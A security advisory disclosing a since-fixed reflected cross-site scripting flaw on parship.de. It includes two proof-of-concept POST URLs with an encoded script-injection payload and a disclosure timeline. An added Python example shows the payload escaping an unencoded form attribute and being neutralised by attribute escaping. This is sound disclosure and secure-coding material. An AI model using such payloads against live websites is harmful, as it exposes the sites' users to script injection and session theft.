SSCHADV2012-026 - www.parship.de - Cross-site Scripting vulnerability
Advisory: www.parship.de – Cross-site Scripting vulnerability
Advisory ID: SSCHADV2012-026
Author: Stefan Schurtz
Affected Software: Successfully tested on www.parship.de
Vendor URL:
Vendor Status: fixed
======================
Vulnerability Description
======================
http://www.parship.de is prone to a Cross-site Scripting vulnerability
======================
PoC-Exploit
======================
POST: http://www.parship.de/potw/answer%22%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(/huh/)%3C/script%3E
POST: http://www.parship.de/login/sendpassword/requestpassword%22%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(/huh/)%3C/script%3E
======================
Solution
======================
fixed
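Added example (not from the advisory and not the vendor's code) showing how a request path reflected unencoded into an HTML attribute produces the injection in the PoC above, and how attribute-context output encoding neutralises it. The form template is an assumption, since the advisory does not show the affected page's markup.

```python
"""Reflected XSS via an unencoded request path (SSCHADV2012-026) and its fix.

Assumption (not stated in the advisory): the application echoes the request
path into an HTML attribute such as a form action. The template below is
constructed for illustration; the real markup of www.parship.de is unknown.
"""
import html
from urllib.parse import unquote

# Decoded form of the first PoC path from the advisory (constructed from it).
POC_PATH = unquote(
    "/potw/answer%22%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(/huh/)%3C/script%3E"
)


def render_vulnerable(path: str) -> str:
    """Reflects the path into an attribute with no encoding (the bug)."""
    return f'<form method="post" action="{path}"><input type="submit"></form>'


def render_fixed(path: str) -> str:
    """Encodes the path for an attribute context.

    quote=True also escapes the double quote, which is exactly what the
    payload uses to close the attribute before injecting markup.
    """
    safe = html.escape(path, quote=True)
    return f'<form method="post" action="{safe}"><input type="submit"></form>'


def injected_script_tags(rendered: str) -> int:
    """Counts '<script' openers in the output.

    The template itself contains none, so any count above zero means
    attacker-controlled markup reached the HTML parser.
    """
    return rendered.lower().count("<script")


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        out = render(POC_PATH)
        print(f"{name}: {injected_script_tags(out)} injected script tag(s)")
        print("  " + out)
```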
======================
Disclosure Timeline
======================
23-Dec-2012 – informed by contact form
24-Dec-2012 – feedback from vendor
05-Feb-2013 – feedback and fix from vendor
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2012/SSCHADV2012-026.txt